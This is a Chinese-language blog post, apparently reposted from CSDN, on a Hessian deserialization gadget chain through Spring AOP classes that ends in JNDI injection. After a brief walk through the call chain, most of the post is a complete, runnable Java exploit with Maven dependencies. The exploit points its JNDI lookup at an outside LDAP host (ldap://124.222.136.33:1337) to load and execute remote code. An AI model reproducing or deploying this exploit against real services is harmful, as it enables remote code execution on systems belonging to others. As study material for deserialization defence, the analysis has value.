本文主要是介绍【Web】浅聊Hessian反序列化之打Spring AOP——JNDI,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
目录
前言
简单分析
EXP
前言
前文:【Web】浅聊Java反序列化之Rome——关于其他利用链-CSDN博客
前文里最后给到一条HotSwappableTargetSource利用链,就是我们今天PartiallyComparableAdvisorHolder链子的前半段(触发恶意类的toString方法),故不再赘述。
多嘴提一句,复现的时候记得jdk换成8u100以下的,jdk8高版本不能执行远程文件,打不了JNDI。
简单分析
简单给出前半部分的调用关系
HashMap#put -> HashMap#putVal -> HotSwappableTargetSource#equals -> XString#equals -> AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolder#toString -> ...
接下来我们来关注省略号的部分,发现接着调用了PartiallyComparableAdvisorHolder的advisor属性AspectJPointcutAdvisor的getOrder方法
跟进,调用this.advice的getOrder方法,这里是AspectJAroundAdvice#getOrder
跟进,this.aspectInstanceFactory为BeanFactoryAspectInstanceFactory,调用BeanFactoryAspectInstanceFactory#getOrder
跟进,this.beanFactory为SimpleJndiBean,调用SimpleJndiBean#getType
跟进,调用SimpleJndiBean#doGetType
跟进,name采用的是单例模式,isSingleton为true,进入if判断,调用doGetSingleton
第一次进入的时候singletonObjects是不会有对应的jndi对象的,所以进入else分支,触发lookup,从而完成JNDI注入
EXP
pom依赖
<dependencies><dependency><groupId>org.springframework</groupId><artifactId>spring-aop</artifactId><version>5.0.0.RELEASE</version></dependency><dependency><groupId>org.springframework</groupId><artifactId>spring-context</artifactId><version>4.1.3.RELEASE</version></dependency><dependency><groupId>org.aspectj</groupId><artifactId>aspectjweaver</artifactId><version>1.6.10</version></dependency><dependency><groupId>com.caucho</groupId><artifactId>hessian</artifactId><version>4.0.66</version></dependency></dependencies>召唤计算器的神奇咒语
package org.Hessian;import com.caucho.hessian.io.HessianInput;
import com.caucho.hessian.io.HessianOutput;
import com.sun.org.apache.xpath.internal.objects.XString;
import org.apache.commons.logging.impl.NoOpLog;
import org.springframework.aop.aspectj.AbstractAspectJAdvice;
import org.springframework.aop.aspectj.AspectInstanceFactory;
import org.springframework.aop.aspectj.AspectJAroundAdvice;
import org.springframework.aop.aspectj.AspectJPointcutAdvisor;
import org.springframework.aop.aspectj.annotation.BeanFactoryAspectInstanceFactory;
import org.springframework.aop.target.HotSwappableTargetSource;
import org.springframework.jndi.support.SimpleJndiBeanFactory;
import sun.reflect.ReflectionFactory;import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;public class EXP {public static void main(String[] args) throws Exception {String jndiUrl = "ldap://124.222.136.33:1337/#aaa";SimpleJndiBeanFactory bf = new SimpleJndiBeanFactory();bf.setShareableResources(jndiUrl);setFieldValue(bf, "logger", new NoOpLog());setFieldValue(bf.getJndiTemplate(), "logger", new NoOpLog());AspectInstanceFactory aif = createWithoutConstructor(BeanFactoryAspectInstanceFactory.class);setFieldValue(aif, "beanFactory", bf);setFieldValue(aif, "name", jndiUrl);AbstractAspectJAdvice advice = createWithoutConstructor(AspectJAroundAdvice.class);setFieldValue(advice, "aspectInstanceFactory", aif);AspectJPointcutAdvisor advisor = createWithoutConstructor(AspectJPointcutAdvisor.class);setFieldValue(advisor, "advice", advice);Class<?> pcahCl = Class.forName("org.springframework.aop.aspectj.autoproxy.AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolder");Object pcah = createWithoutConstructor(pcahCl);setFieldValue(pcah, "advisor", advisor);HotSwappableTargetSource v1 = new HotSwappableTargetSource(pcah);HotSwappableTargetSource v2 = new HotSwappableTargetSource(new XString("xxx"));HashMap<Object, Object> s = new HashMap<>();setFieldValue(s, "size", 2);Class<?> nodeC;try {nodeC = Class.forName("java.util.HashMap$Node");}catch ( ClassNotFoundException e ) {nodeC = Class.forName("java.util.HashMap$Entry");}Constructor<?> nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);nodeCons.setAccessible(true);Object tbl = Array.newInstance(nodeC, 2);Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null));Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null));setFieldValue(s, "table", tbl);//序列化ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();HessianOutput hessianOutput = new HessianOutput(byteArrayOutputStream);hessianOutput.getSerializerFactory().setAllowNonSerializable(true);hessianOutput.writeObject(s);hessianOutput.flush();byte[] bytes = byteArrayOutputStream.toByteArray();//反序列化ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(bytes);HessianInput hessianInput = new HessianInput(byteArrayInputStream);hessianInput.readObject();}public static void setFieldValue ( final Object obj, final String fieldName, final Object value ) throws Exception {final Field field = getField(obj.getClass(), fieldName);field.set(obj, value);}public static Field getField ( final Class<?> clazz, final String fieldName ) throws Exception {try {Field field = clazz.getDeclaredField(fieldName);if ( field != null )field.setAccessible(true);else if ( clazz.getSuperclass() != null )field = getField(clazz.getSuperclass(), fieldName);return field;}catch ( NoSuchFieldException e ) {if ( !clazz.getSuperclass().equals(Object.class) ) {return getField(clazz.getSuperclass(), fieldName);}throw e;}}public static <T> T createWithoutConstructor ( Class<T> classToInstantiate ) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]);}public static <T> T createWithConstructor ( Class<T> classToInstantiate, Class<? super T> constructorClass, Class<?>[] consArgTypes, Object[] consArgs ) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {Constructor<? super T> objCons = constructorClass.getDeclaredConstructor(consArgTypes);objCons.setAccessible(true);Constructor<?> sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons);sc.setAccessible(true);return (T) sc.newInstance(consArgs);}
}
这篇关于【Web】浅聊Hessian反序列化之打Spring AOP——JNDI的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
